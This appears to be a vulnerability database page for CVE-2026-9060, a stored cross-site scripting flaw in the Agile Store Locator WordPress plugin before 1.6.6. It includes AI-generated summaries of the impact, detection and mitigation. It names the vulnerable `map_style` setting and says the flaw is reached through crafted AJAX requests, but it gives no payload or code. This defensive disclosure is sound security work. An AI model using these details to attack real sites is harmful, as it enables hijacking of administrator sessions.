CVE-2026-9060
Received Received - Intake
Stored XSS in Store Locator WordPress Plugin

Publication date: 2026-06-10

Last updated on: 2026-06-10

Assigner: WPScan

Description
The Store Locator WordPress plugin before 1.6.6 does not sanitize and escape one of its settings before storing it and outputting it on the Store Locator WordPress plugin before 1.6.6 admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network where the super admin visits the page).
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-10
Last Modified
2026-06-10
Generated
2026-06-10
AI Q&A
2026-06-10
EPSS Evaluated
N/A
NVD
CVE-2026-9060
EUVD
EUVD-2026-35987
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
agile_store_locator store_locator_wordpress_plugin to 1.6.6 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

The CVE-2026-9060 vulnerability affects the Agile Store Locator WordPress plugin versions prior to 1.6.6. It is a Stored Cross-Site Scripting (XSS) issue that allows high-privileged users, such as administrators, to inject malicious scripts via the `map_style` setting.

The plugin fails to properly sanitize and escape user input before storing it and displaying it on the admin page, enabling attackers to execute arbitrary JavaScript when an administrator views the page.

This vulnerability persists even when the `unfiltered_html` capability is restricted, such as in multisite networks where a super admin without this capability visits the affected page.

An attacker can exploit this by sending a crafted AJAX request to inject an XSS payload into the `map_style` parameter, which is then executed when the admin page is accessed.

Impact Analysis

This vulnerability allows high-privileged users to perform Stored Cross-Site Scripting attacks, which can lead to the execution of arbitrary JavaScript code within the admin interface.

Such attacks can be used to hijack administrator sessions, steal sensitive information, manipulate site settings, or perform other malicious actions with administrator privileges.

Because the vulnerability affects the admin page, it can compromise the security and integrity of the WordPress site, especially in multisite networks where super admins are affected even without the `unfiltered_html` capability.

Detection Guidance

This vulnerability can be detected by checking if the Agile Store Locator WordPress plugin version is prior to 1.6.6, as those versions are affected.

Additionally, detection can involve inspecting the `map_style` setting for suspicious or malicious JavaScript code injections.

A practical approach is to review the plugin's stored settings or database entries related to `map_style` for unexpected script tags or payloads.

Since the vulnerability can be exploited via crafted AJAX requests, monitoring HTTP requests to the plugin's AJAX endpoints for unusual or suspicious payloads targeting `map_style` may help detect exploitation attempts.

Specific commands are not provided in the available resources.

Mitigation Strategies

The immediate mitigation step is to update the Agile Store Locator WordPress plugin to version 1.6.6 or later, where the vulnerability has been fixed.

Until the update can be applied, restrict access to the Store Locator plugin's admin pages to trusted users only, to reduce the risk of exploitation.

Also, consider reviewing and sanitizing the `map_style` setting manually to remove any injected scripts.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-9060. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart